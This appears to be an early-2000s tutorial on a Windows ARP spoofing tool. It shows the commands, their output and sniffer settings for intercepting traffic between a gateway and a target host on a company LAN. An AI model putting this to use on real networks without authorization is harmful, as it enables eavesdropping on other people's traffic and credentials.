Source: ChinaITLab
Based on the principle of sniffing in a switched environment (for details, refer to "Sniffer implementation in a switched environment"), I wrote an ARP sniffer implementation similar to the ArpSpoof implementation in the Linux environment.
On Windows, sniffing requires the following:
1. Install the WinPcap driver.
2. I wrote an ArpSpoof similar to the one in the Linux environment (I have tested it only on Windows 2000 Server, and I look forward to your testing).
3. A sniffer, such as NetXray or NAI Sniffer Pro (recommended).
Specific implementation methods:
Use ArpSpoof to implement ARP-based spoofing:
C:> arpspoof.exe
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
Usage: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
Spoof IP1 and Spoof IP2 are the IP addresses to spoof and sniff, and Own IP is your own IP address (note that the three IP addresses must be within the same LAN and must not span a switch or router).
For example, the company's LAN is 192.168.0.xxx, the subnet mask is 255.255.255.0, and the gateway is 192.168.0.1. Our IP address is 192.168.0.29, and we want to sniff the packets of 192.168.0.2.
Because the gateway is 192.168.0.1, we only need to spoof 192.168.0.1 and 192.168.0.2. In other words, tell 192.168.0.1 that the MAC address of 192.168.0.2 is our own (192.168.0.29), then tell 192.168.0.2 that the MAC address of 192.168.0.1 is our own (192.168.0.29). In this way, all data packets are sent to 192.168.0.29 and forwarded by 192.168.0.29. (For Windows 2000, packet forwarding is enabled by default. I have not tested Windows 9x and Windows NT/XP. I hope you can tell me.)
C:> arpspoof.exe 192.168.0.1 192.168.0.2 192.168.0.29
ARPSpoof, by netXeyes, Special Thanks BB
Www.netXeyes.com 2002, dansnow@21cn.com
Begin Spoof .........
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
Spoof 192.168.0.1: Mac of 192.168.0.2 ==> Mac of 192.168.0.29
Spoof 192.168.0.2: Mac of 192.168.0.1 ==> Mac of 192.168.0.29
........................................ .............
At this point, ARP spoofing of 192.168.0.1 and 192.168.0.2 has started. On 192.168.0.1, run the arp -a command to check that the MAC addresses of 192.168.0.2 and 192.168.0.29 are the same.
C:> arp -a
Interface: 192.168.0.1 on Interface 0x1000004
Internet Address Physical Address Type
192.168.0.2 00-00-86-61-6b-4e dynamic
192.168.0.29 00-00-86-61-6b-4e dynamic
Likewise, on 192.168.0.2, the MAC addresses of 192.168.0.1 and 192.168.0.29 are the same.
In this way, ARP spoofing is implemented between 192.168.0.1 and 192.168.0.2.
Start Sniffer Pro. In Define Filter, set Address Type to Hardware (be sure not to select the usual IP Address type; otherwise, you will not capture anything meaningful) and set Station1 and Station2 to Any.
Sniffing can now begin.
The above results were tested successfully in my LAN environment and are not necessarily applicable to all environments.
I got a lot of assistance from BB in the development and testing process, which delayed the time for reading gossip news. I felt guilty for a long time ...... :-)